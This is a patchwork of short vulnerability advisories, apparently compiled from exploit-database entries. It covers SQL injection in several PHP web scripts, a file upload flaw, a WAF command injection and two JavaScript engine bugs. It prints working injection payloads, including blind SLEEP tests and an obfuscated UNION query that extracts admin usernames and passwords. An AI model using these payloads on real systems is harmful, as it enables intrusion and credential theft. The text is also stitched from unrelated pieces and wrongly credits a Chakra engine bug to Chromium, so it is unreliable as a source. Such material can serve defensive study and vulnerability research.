SQL injection on [detail] URI parameter.
Proof of Concept (PoC):
SQLi: http://localhost/[path]/detail/xx AND 1053=1053/xxxxx
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: AND 1053=1053/xxxx
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: AND SLEEP(5)/xxxx

SQL injection on [sid] parameter.
Proof of Concept (PoC):
SQLi: http://localhost/[path]/single_detail.php?sid=9 AND 5028=5028
Parameter: sid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=9 AND 5028=5028
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: sid=9 AND SLEEP(5)

The vulnerability allows users to upload arbitrary files. It exists due to insufficient validation of the file extension and file type in the 'imageSubmit' and 'proof_submit' functions in the 'UserController.php' script. A remote attacker can upload arbitrary files, including malicious PHP files, to compromise the web application.
A SQL injection vulnerability exists in Cash Back Comparison Script 1.0. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/single-cause.php?pid=[SQL] -22'++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,(/*!00002SELECT*/+GROUP_CONCAT(0x557365726e616d653a,username,0x506173733a,password+SEPARATOR+0x3c62723e)+FROM+admin),0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729)--+- Etc..
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
Stock Photo Selling Script 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the admin credentials of the application.
This vulnerability is related to the Chromium browser. It occurs when the JavascriptFunction::ReparseAsmJsModule() function is used to re-parse an asmjs module. The function resets the function body and then re-parses it, but it does not consider that functionInfo->Parse(functionRef) may throw an exception. This can be exploited by exhausting the stack and then calling the Module() function with an argument, which causes an exception to be thrown and leaves the function body reset.
In JavaScript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this in the parser. There is a bug when it parses 'eval' in a catch statement's parameter. The parser creates a temporary block used to create a scope, but that block is not actually inserted into the AST. If the parser meets 'eval' in 'ParseDestructuredLiteral', it calls 'pnodeCatchScope->SetCallsEval'. But 'pnodeCatchScope' is not inserted into the AST, so the bytecode generator doesn't know the block calls 'eval' and can't create scopes properly.